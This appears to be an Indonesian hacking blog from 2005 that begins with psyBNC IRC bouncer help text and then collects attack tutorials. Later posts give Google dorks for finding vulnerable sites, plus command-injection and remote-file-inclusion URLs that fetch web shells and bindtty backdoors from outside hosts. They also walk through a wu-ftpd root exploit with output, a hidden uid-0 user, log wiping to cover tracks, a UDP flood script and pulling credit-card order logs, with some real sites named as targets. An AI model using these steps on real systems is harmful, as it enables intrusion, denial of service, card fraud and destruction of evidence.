<-psyBNC> BHELP LISTASK - Lists the hosts/bots to ask Op from
<-psyBNC> BHELP ADDIGNORE - Adds a hostmask/contentfilter to the ignores
<-psyBNC> BHELP DELIGNORE - Deletes a hostmask/contentfilter from the ignores
<-psyBNC> BHELP LISTIGNORES - Lists the currently added ignores
<-psyBNC> BHELP ADDDCC - Adds a DCC-Connection to a bot
<-psyBNC> BHELP LISTDCC - Lists all added DCC-Connectionc
<-psyBNC> BHELP DELDCC - Deletes a DCC-Connection by number
<-psyBNC> BHELP DCCCHAT - Offers a DCC Chat to a given IRC User
<-psyBNC> BHELP DCCANSWER - Answers to a DCC Chat-Request
<-psyBNC> BHELP DCCENABLE - Enables/Disables DCC thru psybnc
<-psyBNC> BHELP DCCSEND - Sends a file to a given IRC User
<-psyBNC> BHELP DCCGET - Gets a DCC Send File from an IRC User
<-psyBNC> BHELP DCCSENDME - Sends the bouncer User a File
<-psyBNC> BHELP AUTOGETDCC - always get offered Files
<-psyBNC> BHELP DCCCANCEL - Cancels a dccchat or a transfer
<-psyBNC> BHELP PLAYPRIVATELOG - Plays your Message Log
<-psyBNC> BHELP ERASEPRIVATELOG - Erases your Message Log
<-psyBNC> BHELP ADDLOG - Adds a Log source / filter
<-psyBNC> BHELP DELLOG - Deletes a Log source by number
<-psyBNC> BHELP LISTLOGS - Lists all added Log sources/filters
<-psyBNC> BHELP PLAYTRAFFICLOG - Plays the Traffic Log
<-psyBNC> BHELP ERASETRAFFICLOG - Erases the Traffic Log
<-psyBNC> BHELP ENCRYPT - Encrypts talk to a given channel/user
<-psyBNC> BHELP DELENCRYPT - Deletes an encryption entry by number
<-psyBNC> BHELP LISTENCRYPT - Shows a List of encrypted talks
<-psyBNC> BHELP TRANSLATE - Adds a translator to/from channels/users
<-psyBNC> BHELP DELTRANSLATE - Deletes a translator by number
<-psyBNC> BHELP LISTTRANSLATE - Shows a List of translated talks
<-psyBNC> BHELP * BREHASH - Rehashes the proxy and resets all Connections
<-psyBNC> BHELP * MADMIN - Gives a User an Admin flag
<-psyBNC> BHELP * UNADMIN - Removes the Admin flag from a User
<-psyBNC> BHELP * BKILL - Kills a User from the proxy
<-psyBNC> BHELP * SOCKSTAT - Shows/Logs the current Connections
<-psyBNC> BHELP * ADDUSER - Adds a new User to the Bouncer
<-psyBNC> BHELP * DELUSER - Deletes a User from the Bouncer
<-psyBNC> BHELP * NAMEBOUNCER - Names your bouncer (needed for linking)
<-psyBNC> BHELP * LINKTO - Adds a bouncer Link to the Host/Port
<-psyBNC> BHELP * LINKFROM - Adds a bouncer Link from your Bouncer
<-psyBNC> BHELP * RELAYLINK - Allows or disables a relayable Link
<-psyBNC> BHELP * DELLINK - Deletes a Link to a bouncer
<-psyBNC> BHELP LISTLINKS - Lists all Links to/from the Bouncer
<-psyBNC> BHELP * RELINK - Resets a link to a bouncer by number
<-psyBNC> BHELP * PLAYMAINLOG - Plays the Connection Log
<-psyBNC> BHELP * ERASEMAINLOG - Erases the Connection Log
<-psyBNC> BHELP * ADDALLOW - Adds a host allow to connect
<-psyBNC> BHELP * DELALLOW - Deletes a host allow
<-psyBNC> BHELP * LISTALLOW - Lists the host allows on your proxy
<-psyBNC> BHELP SRELOAD - Reloads the Script for the User
<-psyBNC> BHELP LISTTASKS - Lists the current running tasks
<-psyBNC> BHELP * SETLANG - Sets the language (global)
<-psyBNC> BHELP BHELP - Lists this help or help on a topic
<-psyBNC> BHELP Use /QUOTE bhelp for details.
<-psyBNC> BHELP - End of help
<-psyBNC> Fri Jan 4 17:34:25 :New User:admin (xxx) added by admin
<-psyBNC> Fri Jan 4 17:34:31 :User admin () has no server added

——————————————————————
lalu kita ketik
/addserver irc.dal.net:6667 <<<> Server irc.dal.net port 6667 (password: None) added.
<-psyBNC> Fri Jan 4 17:37:31 :User admin () trying irc.dal.net port 6667 ().
<-psyBNC> Fri Jan 4 17:37:32 :User admin () connected to irc.dal.net:6667 ()

Perintah2 dalam penggunaan psyBNC

Perintah2 dalam penggunaan psyBNC

/server (alamat shell anda)(port)
/quote pass (password psyBNC anda)

contohnya:
/server ltnx.com 1979
/quote pass klowor
Setelah melakukan tahap-tahap di atas anda dapat melakukan arahan-arahan yang ada dalam psyBNC anda sebagai berikut:

/BHELP
Arahan di atas adalah untuk menampilkan menu-menu atau arahan-arahan yang ada pada psyBNC yang anda pakai tersebut.

/BWHO
Digunakan untuk melihat daftar orang-orang atau user yang sedang menggunakan psyBNC yang satu account dengan psyBNC anda.

/ADDUSER
Berfungsi untuk menambah user/pengguna baru dalam account psyBNC anda. Hanya admin psyBNC saja yang boleh memakai arahan ini.
Contoh:
/ADDUSER ident:username (/adduser senthod:phatygeni)

/DELUSER
Untuk menghapus user/pengguna tertentu yang ada dalam account psyBNC anda. Hanya admin yang boleh menghapus user/pengguna.
Contoh:
/DELUSER ident (/deluser senthod)

/BKILL
Untuk meng-kill atau memutus connection user tertentu yang ada di dalam account psyBNC anda tetapi arahan ini tidak akan
menghapus user tersebut tapi hanya akan membuat user disconnect atau putus putus connection untuk sementara.
Hanya admin psyBNC saja yang dapat melakukan arahan ini.

/PASSWORD
Digunakan untuk menukar password atau kata rahsia pada psyBNC anda apabila anda khuatir password anda akan mudah diterka
oleh orang atau pun telah diketahui oleh orang yang tidak anda kehendaki.
Contoh:
/password
/password ole-ole

/ADDSERVER
Untuk memasukkan server-server yang anda kehendaki, misalnya irc.dal.net 6667
Contoh:
/addserver irc.dal.net:6667

/DELSERVER
Digunakan untuk memadamkan server yang ada pada daftar/list pada psyBNC anda.
Contoh:
/delserver 1 (tergantung nomor server pada daftar server yang ada di psyBNC anda)

/LISTSERVERS
Untuk melihat daftar server yang ada pada psyBNC anda.

/JUMP
Untuk menukar atau mengganti server yang anda pakai ke server berikutnya yang ada
pada daftar (list) pada psy-BNC anda yang anda set sewaktu anda pertama kali menggunakan PSYBNC.

/BQUIT
Untuk keluar dari network atau memutuskan sambungan dari server IRC dan nick anda akan tidak terpampang di channel sebelum anda connectkan kembali.

/BCONNECT
Untuk menyambung kembali ke network/server IRC setelah anda melakukan arahan /BQUIT supaya nick anda boleh terpampang kembali pada Channel IRC anda.

/SETAWAY
Arahan ini untuk menampilkan pesan anda ketika anda tidak di dalam IRC atau tidak online. Pesan ini akan nampak bila nick anda
di-whois-kan oleh rakan anda atau user lain yang ingin mengetahui status anda.
Contoh:
/setaway (pesan anda)
/setaway maaf saya sedang berbulan madu jadi belum boleh online dalam waktu ini

/SETAWAYNICK
Untuk mengubah atau menukar nick anda ketika anda keluar dari IRC (offline)
Contoh:
/setaway (nick)
/setaway KUJANG^AFK

/SETLEAVEMSG
Untuk menampilkan teks atau pesan anda ketika anda keluar dari IRC (offline.)
Contoh:
/setleavemsg (pesan)
/setleavemsg Sorry, sila tinggalkan pesanan suara anda....!!

/SETUSERNAME
Untuk mengganti user name yang tampil setelah IP address anda ketika di-whois.
Contoh:
/setusername (nama yang anda kehendaki)
/setusername sontoloyo

/VHOST
Untuk mengganti Vhost (Virtual Host) atau IP address psyBNC anda ke Vhost yang anda kehendaki.
Virtual Host atau Vhost adalah address yang anda gunakan pada ketika anda online.
Contoh:
/vhost (vhost yang anda kehendaki dan disediakan oleh shell anda)
/vhost aston.crack.in.the.box.shell.org

/PLAYPRIVATELOG
Untuk menampilkan pesan-pesan untuk anda selama anda tidak berada di IRC (offline),
pesan ini dapat dirakam secara automatik ketika seseorang melakukan msg atau private msg.
Untuk menggunakan arahan ini anda hanya cukup me-layprivatelog maka automatik akan tampil pesan-pesan untuk anda dalam sebuah windows
dengan nama psyBNC atau message.

/ERASEPRIVATELOG
Untuk menghapus privatelog atau pesan yang telah anda baca dan anda tidak membutuhkan pesan-pesan itu lagi.

Cara Mudah Untuk membuat BOT

Cara Pertama:

NB: BOT Ini akan otomatis jalan pada server dalnet " khusus Untuk dalnet server "
1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz
atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <--untuk tambahan creat.tcl 2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2 3. cd .kin 4. ./creat fileconf nick ident IP channel owner contoh: ./creat defaced Mr_Lam3r 212.88.174.3 defaced dr_zig defaced.................... file conf yg akan dibuat (akan terbuat dgn sendirinya) Mr_Lam3r ...............nick bot dr_zig ...................ident bot 212.88.174.3 .......IP shell defaced ..................... nama channel, jangan pake # dr_zig ................ nick owner catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash) contoh: mich`keren -> mich\`keren

5. ./eggdrop -m fileconf
atau ./run fileconf fakename
fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat

contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)
Udah deh! tunggu aja di channel, ato whois aja nicknya.
Bila ingin tambahkan tcl lain seperti creat.tcl :

2. ./tcl -t fileconf creat.tcl
contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )
untuk penggunaan bisa diliat dengan command/perintah !creat dichannel

Cara Kedua:

wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi
# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt
# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/
# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi
./shade "httpd" ./eggdrop -m bot.txt
# usage:
# pv bot kamu di channel
# /msg nick-bot-kamu auth
# /msg nick-bot-kamu pass
# /msg nick-bot-kamu auth

Cara Buat Psy Dari shell

cd /var/tmp
mkdir ...
cd ...
pwd
wget www.acspakistan.com/sh/aris.tar.gz
tar -zxvf aris.tar.gz
cd ChuCu
./config
./fuck
./run
########################

Cara Buat Bot

wget http://www.discountcarshop.co.uk/data/sh/basica.tar.gz
curl -f -O http://www.discountcarshop.co.uk/data/sh/basica.tar.gz
tar -zxvf basica.tar.tz
cd scripts
rm -fr ary.tcl
curl -f -O http://www.discountcarshop.co.uk/data/sh/netgate.tcl
mv netgate.tcl ary.tcl
cd ..
./serly fileconf nick ident IP channel owner
./serly a.txt asen-keren ident 209.59.132.199 green^hause AseN
./run a.txt /usr/local/apache/bin/httpd
########################

Cara Bindtykan phpBB2 Ke Putty
cd /tmp;wget geocities.com/c0_pampers/as.tar.gz
cd /tmp;curl -f -O geocities.com/c0_pampers/as.tar.gz
cd /tmp;tar -zxvf as.tar.gz
cd /tmp/.asen;./fuck;./run
cd /tmp/awyeah;./fuck
cd /tmp/awyeah;./run

Nb: netstat -a <- Buat Liat Port ########################## Cara Buat Cgi dari Shell
01. Login Shell
02. wget www.geocities.com/wisen_asen/a.pl
03. ftp
04. login
05. Pasword
06. User
07. cd www
08. 250 CWD command successful
09. ls -alF
10. mput a.pl
11. chmod 755 a.pl

##########################

Buat Tembak Ip Org Dari Shell
wget geocities.com/kupu2hitamputih/udppl.txt
mv udppl.txt AseN.pl
chmod 755 AseN.pl
perl AseN.pl 60000 60000


http://lieur-euy.cat-on-line.com/psybnc2.3.1.exe <-------- psy

posted by HAIDIR @ 7:24 AM 0 comments


Saturday, August 27, 2005

Hacking PNPhpbb

Hacking PNphpBB2

1. Gunakan paman google, cari situs yang menggunakan PNphpBB2
keywordnya = allinurl:pnphpbb2 site:ru

2. Masuk ke halaman utama situs sasaran. -->> http://sasaran.ru

3. Tambahkan address-nya sehingga menjadi
http://sasaran.ru/modules/PNphpBB2/includes/function_admin.php?phpbb_root_path=http://nobodycare.com/php.jpg?

4. Jika yang muncul adalah php injection, selamat anda telah berhasil masuk ke dalam system korban. :-)

posted by HAIDIR @ 10:28 AM 0 comments



Hacking PHPBB 2.0.10

hacking phpbb 2.0.10

1. Cari sasaran menggunakan paman google. keywordnya = phpbb 2.0
Jangan menggunakan keyword viewtopic karena gak akan diijinkan.

2. Kunjungi alamat forum yang didapat. Lihat dan kunjungi hingga pada bagian address tertulis
http://sasaran.com/viewtopic.php?t=4(angka 4 bisa saja lain)

3. Kemudian pada bagian address coba tambahkan &highlight=%2527
http://sasaran.com/viewtopic.php?t=4&highlight=%2527

4. Jika yang muncul adalah error, maka bererti forumnya vuln (bolong).
Jika tidak, cari sasaran lain. :-)

5. Setelah Muncul error coba tambahkan lagi menjadi

http://sasaran.com/viewtopic.php?t=t=4&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=ls -al

6.
Jika yang muncul adalah daftar nama file dan direktori, selamat anda telah berhasil masuk ke dalam sysytem sasaran

7. Jika ada error tetapi eksekusi perintah cmd= tidak berjalan kemungkinan fungsi passthru sudah dimatikan oleh admin. Cari sasaran lain.

Contoh forum yang vuln :
http://batam.linux.or.id/forumlinux/viewtopic.php?t=19

posted by HAIDIR @ 10:19 AM 0 comments


Thursday, August 25, 2005

CGI - Perl Exploit

EXPLOITASI COMMAND EXECUTION DI PERL / CGI
by BLAHPLOK aka CHOI


Khusus buat #e-c-ho, #indonesiahack, #jambihackerlink

Disini nggak akan dijelaskan mengapa command execution ini bisa terjadi,
Kalo ingin mengcari tahu, silahkan mencari di google dan baca …
So, Kita langsung ajah….

SATU :
Mencari Target…
1. Buka Opera, internet explorer, mozilla dll
2. Masukkan alamat www.google.com di address bar
3. Masukkan keyword pencarian.
Catatan :
Trick menggunakan keyword dalam mencari bug cgi / perl :
a. Gunakan words / kata2 yang mengarah secara langsung pada hal yang akan kita cari
b. Gunakan key “allinurl:”
c. Gunakan tanda petik ganda (“) jika diperlukan
contoh 1:
allinurl: “news.cgi?news=” txt
Ini akan mencari semua url yang mengandung url news.cgi?news=, dan file yang akan
Di buka yakni file dengan ektensi txt.
Contoh 2 :
allinurl: cgi action dat
ini akan mencari semua url yang ada kata cgi, action dan dat, jadi biasanya url yang
didapat adalah url yang mangandung file dengan akhiran .cgi ato .pl diikuti dengan
parameter action dan membuka file dengan ektensi dat.
(dengan key inilah bug WPS_SHOPPING ditemukan).
4. Oke sekarang kita telah memasukkan keyword yang kita inginkan. Dalam contoh ini
kita akan mengunakan keyword = allinurl: cgi action file dat -> lalu klick cari/search
dan hasilnya ………………………………………..:

DUA:
Exploitasi:

1. Sekarang kita masuk ke exploitasi :
Dalam exploitasi cgi/perl sangat mudah sekali. Yakni kita hanya memerlukan dua
Karackter penting yaitu ‘|’ dan ‘;’ yang di letakkan pada tempat nama file yang akan
dibuka.
Sebagai contoh:
Sekarang kita lihat url pada halaman pertama, yakni :
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat&page=0
Klick kanan url tersebut dan klick open in new window.
Setelah terbuka alamat url tersebut, Sekarang kita tambahkan character penting
tersebut diatas, yakni pipe ‘|’. Pada akhir nama file yang akan dibuka yakni :
file=.file0011.dat|ls|
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|ls|&page=0
(ls dalam command di linux shell adalah sama dengan dir pada windows, yakni
melihat seluruh file directory aktif)
yupe, sekarang kita bisa melihat pada tampilan halaman, ada perubahan tampilan,
yakni disitu terlihat yang semula berisi huruf2 jepang, sekarang ada tulisan file. Itu
artinya webserver tersebut vulnerable untuk di hack…!!!!
Catatan: Tidak semua file cgi yang vulnerable ketika kita tambahkan char ‘|ls|’
Akan menampilkan file2-nya di browser. Ada yang tidak terlihat dan ada yang terlihat.
Yupe, sekarang coba kita lihat id kita:
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|id|&page=0
hasilnya : uid = bla bla bla
Asal uid bukan nobody, maka kita nggak akan kesulitan untuk langkah selanjutnya.

2. Memasukkan backdoor. (web backdoor)
Kita bisa memasukkan beberapa jenis backdoor seperti bindtty dll............
Kenapa saya memilih web backdoor..??? karena web backdoor ini merupakan
Backdoor yang sangat ampuh (menurut saya). Sulit di deteksi (apalagi kalo pake
penyamaran nama file yang bener2 ok)
Tidak terpengaruh oleh firewall dan admin web pada saat mengecek koneksi yang
terjadi pada web-nya, yang mereka tau adalah kita hanya seperti browsing biasa.
Karena kita melakukannya lewat port 80….!!!
Saya menggunakan backdoor dari "http://www.rohitab.com/cgiscripts/cgitelnet.txt"
Baik sekarang kita akan melakukan uploading backdoor tersebut ke web target.
Dalam mengupload backdoor, kita akan menggunakan command wget. Yakni
command di linux yang khusus untuk download ke web server.
Catatan :
Tidak semua server menginstall wget, dan jika itu terjadi, maka pilihan kita selanjutnya
Adalah menggunakan lwp-download, fasilitas download dari perl.

Contoh : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|wget http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
Kita mengambil cgitelnet.txt dari http://www.rohitab.com/cgiscripts/cgitelnet.txt,
Yang selanjutnya akan di save di http://www.mikazo.net/cgiscript/sample/zdiary/
Sekarang kita check apakah kita berhasil ato tidak.
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt

jika ada pesan error file not found, berarti kita gagal menggunakan wget, selanjutnya
kita coba alternatif kedua : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|lwp-download http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
sekarang kita chek lagi :
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt
Yupe sekarang ada tampilan source dari cgitelnet.txt.
Selamat berhasil….!!!! :P~
Baik sekarang apa selanjutnya..???
Selanjutnya adalah kita harus merubah nama cgitelnet.txt ke cgitelnet.cgi dan merubah
Chmod-nya ke 755 agar kita bisa mengexekusi-nya.
a. Merubah nama cgitelnet.txt ke cgitelnet.cgi
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|mv cgitelnet.txt cgitelnet.cgi|&page=0
b. Merubah chmod ke 755
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|chmod 755 cgitelnet.cgi|&page=0

TIGA :
Execkusi backdoor dan selancar di system target

Oke, sekarang kita telah berhasil memasukkan backdoor ke web target. Sekarang coba
kita exekusi:
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.cgi
tampilan yang muncul adalah :
login: admin
password: enter

baik sekarang kita masukkan password.
Password = changeme
daaaannn…. Hasilnya adalah :

[admin@www.mikazo.net /home/s20144-1/public_html/cgiscript/sample/zdiary]$

selesai….!!!!!

Oke, sekarang info:
Pada contoh di atas, saya menggunakan bug pada zdiary.cgi.
zdiary v1.51, v1.52 (all version) by mikazo
untuk mencari webserver yang menginstall zdiary, gunakan key word pada google
sebagai berikut :
allinurl: “zdiary.cgi”

posted by HAIDIR @ 7:33 AM 0 comments


Friday, August 19, 2005

Hacking Server dengan Shell

Hacking Server Dari shell

Berikut ini saya paparkan bagaimana cara menghack suatu server dari shell.
lets...Try For Hack...

Langkah pertama, kita masuk dulu ke shell kita, setelah kita berada di shell kita, kita download doloe exploits itu.www.utay-doyan.cc/ftp.tgz - www.utay-doyan.cc/xpost.tgz.
Jadi di shell kita tinggal ketik wget www.utay-doyan.cc/ftp.tgz .
Setelah file udah selesai di download ketik tar -zxvf ftp.tgz .
Begitu juga dengan exploits xpost.tgz, cara compile nya sama dengan compile ftp.tgz seperti di atas. perlu di ingat paling tidak kita membuka dua session telnet or ssh . satu untuk exploits ftp satu session untuk xpost.
Nahh, abis itu kita tinggal masuk ke directory ftp ketik cd ftp otomatis kita udah ada di directory ftp, and di session satunya buat xpost kita ketik cd xpost . Setelah kita udah berada di directory xpost contoh ketik ./scan 202.1 tekan enter. Maksud dari ./scan 202.1 adalah kita men scan ip 202.1 sampai selesai, abis kita enter tinggal tunggu aja nanti akan ada keterangan seperti ini :

[iwek@jarada xwurm]$ ./scan 211.240
Wait for Scanning 211.240 (3-5 minutes for class B)
Scan Result:
--------------------------------
211.240.28.66
211.240.38.1
211.240.48.62
211.240.48.190
211.240.56.62
211.240.56.254
211.240.56.126
211.240.61.30
211.240.61.62
211.240.61.126
211.240.61.158
211.240.61.238
--------------------------------
Results logged in wu-scan.log
[iwek@jarada xwurm]$



nahh itu hasil dari scan nyah tadi. tinggal kita ketik ./masswu wu-scan.log tunggu aja doloe, nttar kalo ada keterangan You Have Root In 211.240.56.254 berarti kemungkinan besar kita dapet jebol itu server.

Abis itu di session telnet yang satu nya, yang udah siap di directory ftp, kita ketik ./awu 211.240.56.254 apabila ada keterangan seperti di bawah ini :

[iwek@jarada ftp]$ ./awu 211.240.56.254
Checking 211.218.149.47 for vulnerable wu-ftpd 2.x <>
Compiled for MnM 01/12/2001..pr0t!

# trying to log into 211.240.56.254 with (ftp/mozilla@) ... connected.
# banner: 220 root.ivines.co.kr FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
############################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow


Yess.. Berarti kita udah masuk server itu. coba ketik whoami apabila keterangnnya di bawah root berarti kita udah dapet acces root.

Mo adduser ? nahh nttar ketik /usr/sbin/adduser ganjen -g wheel -s /bin/bash -d /home/ganjen tekan enter, abis itu buat password nyah ketik

passwd ganjen tekan enter , abis itu ketik kanjud tekan enter abis itu ketik lagi kanjud , nb: ketik kanjud dua kali itu kegunaan nya buat password kita

nahh apabila ada keterangan :

Changing password for user ganjen
passwd: all authentication tokens updated successfully


berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 -d /

abis itu ketik lagi

passwd -d crit

abis ketik itu kita otomatis udah dapet acces root

nahh semuanya udah selesai khan... jangan ampe lupa apus jejak supaya ga cepet matek shell nyahh... abis semuanya kelar kita udah add user udah dapet acces root nttar ketik :

cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

udah di ketik semua ? udahh... tekan ctrl d . udah deh ... keluar khan... crottt... hiahaihaia mudah khan :) nice to try. Buat exploits lain kamu bisa cari di site-site laen...

posted by HAIDIR @ 5:55 AM 0 comments



Cari CC di *.Log

Beriku Adalah tutorial lama untuk Cari CC (BUkan Cawat Cewe) :P
Lets Begin

gini
buka google
keywordnya "cgi-bin/store/index.cgi?page="
salah satu alamat site nya yg ada di google : http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
Repair_Manuals.htm <= ini dibuang trus trus masukin bug ini => http://fadliyanur.multiply.com/admin/files/order.log
trus
http://www.cashwells.com/cgi-bin/store/index.cgi?page=http://fadliyanur.multiply.com/admin/files/order.log
ok

Ok gimana...tuh drama singkat antara aku dengan Maling_duit...dan kayaknya si Maling_duit ituh yg lagi baca nih :)...emang enaaaaaaaaakkk.....Gua ngga Tanggung Jawab Kalo Trantib datang kerumah elo buat minta jatah hasil cardingan elo yaa...:P

Keep To Share.

posted by HAIDIR @ 5:38 AM 0 comments



Instal CGI Telnet

Install Cgi-telnet
1.buat url seperti ini :


" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "

url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.

2. buat cgi-telnet test.pl jadi file eksekusi :

" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl "

3. akses cgitelnet kita dengan membuka url :
" http://www.target.com/cgi-bin/test.pl "

masukkan passwordnya "n0fr13"

posted by HAIDIR @ 4:38 AM 0 comments



PHP SUPER BUGS

Tittle : SUPER KIDDIES HACKING: "PHP SUPER BUGS"
Author : K-159
Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,
Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel
Email : eufrato@linuxmail.org
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
------------------------------------------------------------------------------------
Prolog : i wrote this tutorial just for my dearest brother "Lieur-Euy" thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. 'n we will rock the world again :)

1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?filename=*".
keyword '*.php' bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?filename=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword "allinurl:*.php?content=".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?content=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
" http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword "allinurl:*.php?page=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?page=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?link=*".
keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?link=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword "allinurl:*.php?file=*".
'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?file=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd "
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd "
3.eksekusi file httpd tadi :
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd "
4. buka telnet ke IP target sesuai dg port bindttynya



 

Ranieqyu Copyright © 2010 Designed by Ipietoon Blogger Template Sponsored by Online Shop Vector by Artshare